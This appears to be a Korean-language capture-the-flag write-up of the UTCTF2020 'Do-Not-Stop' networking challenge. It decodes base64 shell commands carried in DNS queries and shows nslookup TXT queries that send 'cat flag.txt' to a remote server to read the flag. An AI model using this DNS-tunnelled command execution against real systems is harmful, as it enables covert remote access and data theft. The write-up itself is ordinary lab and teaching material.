Jaeseo's Information Security Story

UTCTF2020 - [NETWORKING]Do-Not-Stop 본문

Write UP/UTCTF2020

UTCTF2020 - [NETWORKING]Do-Not-Stop

Jaeseokim 2020. 3. 9. 16:39

[NETWORKING]Do-Not-Stop

일단 문제 제목이 Do Not Stop 인 것을 보아 DNS 패킷에 대해 관심을 가져야 할 것 같습니다.

일단 패킷을 분석을 하면서 DNS 패킷을 분석 해본 결과 DNS Query를 통해 35.188.185.68에 base 64 형태로 Qeury를 전달하는 모습을 볼 수 있었습니다.

이때 응답값을 확인해보면

request 192.168.232.129 > 35.188.185.68 = d2hvYW1pCg== >> "whoami"

response 35.188.185.68 > 192.168.232.129 = cm9vdA== >> "root"

request 192.168.232.129 > 35.188.185.68 = bHMgLWxhCg== >> "ls -la"

response 35.188.185.68 > 192.168.232.129 =

dG90YWwgMjUxMgpkcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA0MDk2IE1hciAgNiAwNDo0NCAuCmRyd3hyLXhyLXggICAgMSByb290ICAgICByb290ICAgICAgICAgIDQwOTYgTWFyICA2IDA4OjA5IC4uCi1ydy1yLS1yLS0gICAgMSByb290ICAgICByb290ICAgICAgICAgMTIyODggTWFyICA2IDA0OjQyIC5NYWtlZmlsZS5zd3AKLXJ3LXItLXItLSAgICAxIHJvb3QgICAgIHJvb3QgICAgICAgICAgIDEwNCBNYXIgIDUgMjM6NTAgRG9ja2VyZmlsZQotcnctci0tci0tICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICAgMTE5IE1hciAgNSAyMzo1MCBNYWtlZmlsZQotcnctci0tci0tICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICAgIDI4IE1hciAgNSAyMzo1MCBmbGFnLnR4dAotcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAyNTMzODIzIE1hciAgNiAwNDo0NCBzZXJ2ZXIKLXJ3LXItLXItLSAgICAxIHJvb3QgICAgIHJvb3QgICAgICAgICAgMTY5MyBNYXIgIDUgMjM6NTAgc2VydmVyLmdv

\>> "total 2512  
drwxr-xr-x 1 root root 4096 Mar 6 04:44 .  
drwxr-xr-x 1 root root 4096 Mar 6 08:09 ..  
\-rw-r--r-- 1 root root 12288 Mar 6 04:42 .Makefile.swp  
\-rw-r--r-- 1 root root 104 Mar 5 23:50 Dockerfile  
\-rw-r--r-- 1 root root 119 Mar 5 23:50 Makefile  
\-rw-r--r-- 1 root root 28 Mar 5 23:50 flag.txt  
\-rwxr-xr-x 1 root root 2533823 Mar 6 04:44 server  
\-rw-r--r-- 1 root root 1693 Mar 5 23:50 server.go"

DNS 쿼리를 이용하여 원격코드 실행을 하는 모습을 볼 수 있었습니다.

위 내용을 바탕으로 flag.txt 의 내용을 확인 하는 payload를 전송 하기위해 아래처럼 내용을 작성 했습니다.

cat flag.txt >> "Y2F0IGZsYWcudHh0"

nslookup -type=TXT Y2F0IGZsYWcudHh0 35.188.185.68 

이렇게 35.188.185.68 에 Query를 하면 응답이 없는 모습을 볼 수 있는데

다시한번 DNS 패킷을 확인 해보면 35.225.16.21에 dns.google.com의 IP를 질의를 하고 그 IP에 payload를 전송 하는 모습을 볼 수 있습니다. IP 주소가 변경 되었을 것이라 예상을 하고 query를 날려 IP를 알아봅니다.

nslookup -type=A dns.google.com 35.225.16.21

그 결과 3.88.57.227 라고 나오는데 이제 이 주소에 payload를 전송 합니다.

nslookup -type=TXT Y2F0IGZsYWcudHh0 3.88.57.227 

응답이 "dXRmbGFneyRhbDF5X3MzTDFTX3NFNF9kTiR9" 으로 오고 이것을 decoding 하면 FLAG가 보입니다.

utflag{$al1y_s3L1S_sE4_dN$}

'Write UP > UTCTF2020' 카테고리의 다른 글

UTCTF2020 - [NETWORKING]Nittaku-3-Star-Premium  (0) 2020.03.09
UTCTF2020 - [WEB]Shrek-Fans-Only  (0) 2020.03.09
UTCTF2020 - [WEB] spooky-store  (0) 2020.03.09
Comments